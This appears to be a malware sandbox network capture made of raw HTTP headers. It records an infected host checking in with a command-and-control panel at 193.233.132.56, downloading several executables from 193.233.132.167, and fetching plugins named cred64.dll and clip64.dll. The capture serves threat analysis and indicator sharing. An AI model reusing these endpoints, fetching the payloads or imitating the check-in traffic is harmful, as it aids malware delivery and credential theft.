Network Analysis

GET /demo/home.php?s=175.208.134.152 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 04:12:06 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive x-iplb-request-id: AC46C793:F592_93878F2E:0050_6621EF16_8CD7D4F:4F34 x-iplb-instance: 59215 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RjZEsGfyKNEsBeK1Ef68xs0yABEzRXGP50xH0NCZ%2FSrZl%2BcvjS1Q7Xit%2BNmVLL2j%2Bu1PmCKtnT67S2RqUHvkIOP86Vx%2B9TMw%2F5Z4g56ntx4Xntn2bcqU96m%2FVg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 876a0de9d96c29db-FUK alt-svc: h3=":443"; ma=86400

POST /Pneh2sXQk0/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.56 Content-Length: 4 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 19 Apr 2024 04:11:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php

POST /Pneh2sXQk0/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.56 Content-Length: 160 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 19 Apr 2024 04:11:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /mine/amert.exe HTTP/1.1 Host: 193.233.132.167

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 19 Apr 2024 04:11:33 GMT Content-Type: application/octet-stream Content-Length: 1949184 Last-Modified: Fri, 19 Apr 2024 03:59:21 GMT Connection: keep-alive ETag: "6621ec19-1dbe00" Accept-Ranges: bytes

POST /Pneh2sXQk0/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.56 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 19 Apr 2024 04:11:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /mine/random.exe HTTP/1.1 Host: 193.233.132.167

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 19 Apr 2024 04:11:36 GMT Content-Type: application/octet-stream Content-Length: 1166336 Last-Modified: Fri, 19 Apr 2024 03:58:24 GMT Connection: keep-alive ETag: "6621ebe0-11cc00" Accept-Ranges: bytes

POST /Pneh2sXQk0/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.56 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 19 Apr 2024 04:11:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /cost/random.exe HTTP/1.1 Host: 193.233.132.167

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 19 Apr 2024 04:11:38 GMT Content-Type: application/octet-stream Content-Length: 2304512 Last-Modified: Fri, 19 Apr 2024 03:58:43 GMT Connection: keep-alive ETag: "6621ebf3-232a00" Accept-Ranges: bytes

POST /Pneh2sXQk0/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.56 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 19 Apr 2024 04:11:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /cost/sarra.exe HTTP/1.1 Host: 193.233.132.167

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 19 Apr 2024 04:11:41 GMT Content-Type: application/octet-stream Content-Length: 2370560 Last-Modified: Fri, 19 Apr 2024 03:58:51 GMT Connection: keep-alive ETag: "6621ebfb-242c00" Accept-Ranges: bytes

GET /Pneh2sXQk0/Plugins/cred64.dll HTTP/1.1 Host: 193.233.132.56

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 19 Apr 2024 04:11:42 GMT Content-Type: application/octet-stream Content-Length: 1285632 Last-Modified: Sun, 03 Mar 2024 11:54:33 GMT Connection: keep-alive ETag: "65e464f9-139e00" Accept-Ranges: bytes

POST /Pneh2sXQk0/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.56 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 19 Apr 2024 04:11:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

POST /Pneh2sXQk0/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.56 Content-Length: 21 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 19 Apr 2024 04:11:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /Pneh2sXQk0/Plugins/clip64.dll HTTP/1.1 Host: 193.233.132.56

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 19 Apr 2024 04:11:54 GMT Content-Type: application/octet-stream Content-Length: 112128 Last-Modified: Sun, 03 Mar 2024 11:54:32 GMT Connection: keep-alive ETag: "65e464f8-1b600" Accept-Ranges: bytes

POST /Pneh2sXQk0/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 193.233.132.56 Content-Length: 5 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 19 Apr 2024 04:11:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive